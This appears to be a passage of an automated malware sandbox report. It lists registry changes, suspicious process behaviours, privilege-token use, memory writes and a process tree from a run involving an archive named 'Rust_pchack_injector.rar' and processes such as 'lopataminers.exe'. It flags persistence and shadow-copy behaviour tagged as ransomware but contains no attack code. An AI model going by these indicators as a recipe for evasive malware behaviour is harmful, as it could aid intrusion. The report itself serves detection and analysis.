Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133280224908971920"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WerFault.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r14\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r24\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r25	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR"	uninstall.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext32.dll"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r03	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tgz	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r23\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tgz\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r04\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r24	uninstall.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r06	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r29	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tbz2	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r09	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r00	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r12	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r18	uninstall.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zipx	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r16	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zipx\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tar	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bz2\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r17	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r20	uninstall.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lha	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.uu	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR"	uninstall.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4248	chrome.exe
4248	chrome.exe
3620	lopataminers.exe
3620	lopataminers.exe
4364	powershell.exe
4364	powershell.exe
3620	lopataminers.exe
3620	lopataminers.exe
3620	lopataminers.exe
3620	lopataminers.exe
3620	lopataminers.exe
3620	lopataminers.exe
2264	powershell.exe
2264	powershell.exe
3620	lopataminers.exe
3620	lopataminers.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
1168	WerFault.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
4016	MssurrogateMonitor.exe
1168	WerFault.exe
1168	WerFault.exe
4708	powershell.EXE
4708	powershell.EXE
1168	WerFault.exe
4708	powershell.EXE
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
4436	dllhost.exe
940	WerFault.exe
940	WerFault.exe
4436	dllhost.exe
4436	dllhost.exe
3808	WerFault.exe
3808	WerFault.exe
4436	dllhost.exe
4436	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1400	OpenWith.exe
3220	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
3808	WinRAR.exe
3808	WinRAR.exe
3808	WinRAR.exe
3808	WinRAR.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe
4292	chicka.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe

Suspicious use of SetWindowsHookEx 24 IoCs

pid	Process
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
1400	OpenWith.exe
3912	winrar-x64-621.exe
3912	winrar-x64-621.exe
3808	WinRAR.exe
3808	WinRAR.exe
4272	spoolsv.exe
2508	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4248 wrote to memory of 4788	4248	chrome.exe	95
PID 4248 wrote to memory of 4788	4248	chrome.exe	95
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 3920	4248	chrome.exe	96
PID 4248 wrote to memory of 2148	4248	chrome.exe	97
PID 4248 wrote to memory of 2148	4248	chrome.exe	97
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98
PID 4248 wrote to memory of 2604	4248	chrome.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:380
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1c6a002b-ee23-4ef9-b4d6-d3fe65d60bd5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{89c019c4-c788-4503-bdf6-6ab76d32e79b}
  2⤵
  PID:4292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1380

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1424
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2484

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2512

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2980

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3692
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3692 -s 400
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4888

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:1096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:2080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3268

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3656

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3564
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3564 -s 912
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3328

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:3220
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Rust_pchack_injector.rar
  2⤵
  PID:564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4248
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad12b9758,0x7ffad12b9768,0x7ffad12b9778
    3⤵
